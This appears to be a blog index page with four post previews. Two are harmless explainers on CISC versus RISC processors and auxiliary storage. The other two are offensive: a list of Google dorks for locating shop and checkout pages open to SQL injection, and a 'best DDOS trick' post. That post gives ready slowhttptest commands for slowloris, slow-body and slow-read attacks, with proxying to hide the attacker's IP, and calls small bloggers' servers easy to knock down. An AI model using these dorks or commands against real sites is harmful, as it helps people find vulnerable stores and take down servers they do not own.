Skip to main content

Popular posts from this blog

CISC VS RISC computers (all details)

By
CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. T...
Post a Comment
Read more

Google Dorks for sql injection | new 2017 |

By
default.php?catID= cart_additem.php?id= item_show.php?code_no= details.php?BookID= item.php?prodtype= inurl:php?id+site:it+show inurl:php?id+site:fr+show inurl:php?id+site:dk+shop inurl:php?id+site:pt+shop inurl:php?id+site:za+shop inurl:php?id+site:fi+shop acclogin.php?cartID= addToCart.php?idProduct= inurl:php?id+site:es+shop inurl:php?id+site:ro+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+checkout List.php?CatID= inurl:php?id+site:au+product inurl:php?id+site:au+succes inurl:php?id+site:uk+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+shop inurl:php?id+site:it+shop inurl:php?id+site:de+shop inurl:php?id+site:pl+shop itemdetail.php?item= inurl:php?id+site:au+checkout
3 comments
Read more

what are Auxiliary Storage Devices ? (squential vs Random auxiliary storage)

By
              Auxiliary storage, secondary storage, or external storage are devices that store noncritical system data like documents, multimedia and programs, which are used whenever they are required. These files are invoked from the auxiliary storage when needed and then transferred to the primary storage so that the CPU can process them. The results of the process can also be sent back to the auxiliary storage for later retrieval. These storage devices hold data and programs for future use and are considered nonvolatile storage that retains information even when power is not available. The best example of auxiliary storage is hard disk drives and optical storage media like CDs, DVDs, and Blue ray. Other auxiliary storage belongs to the peripheral devices category as well, such as flash drives and any type of memory card. ž   Auxiliary storage devices can be categorized in two types based on data access.  1. Sequential Access ...
Post a Comment
Read more

Best DDOS trick you ever know | 2017 New post | enjoy

By
SlowHTTPTest is a highly configurable tool that simulates some Application
Layer Denial of Service attacks.It implements most common low-bandwidth Application
 Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack(based on TCP persist timer exploit)
 by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant
 memory and CPU usage on the server.Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires
 requests to be completely received by the server before they are processed. If an HTTP request is not complete,
or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data.
 If the server keeps too many resources busy, this creates a denial of service.
 This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Installation for Debian based OS users.

apt-get install slowhttptest
Usage

slowhttptest is a great tool as it allows you to do many things. Following are few usages
Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Example of usage in slow read mode with probing through proxy

Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080
Conclusion:

If you can run multiple DoS tools such as GoldenEye,
 hping3 on a single web server, then it is very easy to knock it down.
 There are strategies to defend against such attacks, but for a small server
where resource is limited and run by non IT people (bloggers etc.)
it quickly becomes a nightmare.In the next tutorial how to protect agains Slow HTTP Attacks.
#best_DDOS trick

Comments

Post a Comment